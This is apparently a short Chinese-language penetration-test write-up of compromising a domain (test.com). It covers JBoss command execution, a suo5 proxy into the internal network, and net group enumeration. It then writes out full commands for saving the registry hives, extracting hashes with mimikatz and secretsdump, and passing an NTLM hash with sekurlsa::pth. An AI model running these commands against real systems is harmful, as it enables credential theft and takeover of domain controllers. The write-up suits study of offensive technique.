小结:没有难度,通过入口点搭建http代理,通过抓取reg后本地解密,利用hash注入登录域控
通过jboss成功命令执行
但是出网限制为域名,ip无法访问,因为没有对c2配置域名,所以暂时无法上线cs。通过suo5代理进内网
通过信息收集发现直接为域控
net group "domain computers" /domain 成员计算机
net group "domain controllers" /domain 域控机器
net group "domain admins" /domain 域管账号
当前域:
test.com
|
通过reg抓取后本地解密
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
mimikatz.exe "lsadump::sam /system:system.hive /sam:sam.hive" exit
或
python C:\Users\Administrator\Desktop\pentest\Intranet\impacket-0.11.0\examples\secretsdump.py -sam sam.hive -security security.hive -system system.hive LOCAL
|
获取域管hash
解不开密码,hash注入方式打开adexplorer
privilege::debug
sekurlsa::pth /user:administrator /domain:test.com /ntlm:17b08c61c70abc49f54bba0000000000 "/run:C:\Users\Administrator\Desktop\pentest\Intranet\Domain\ADExplorer64.exe"
|
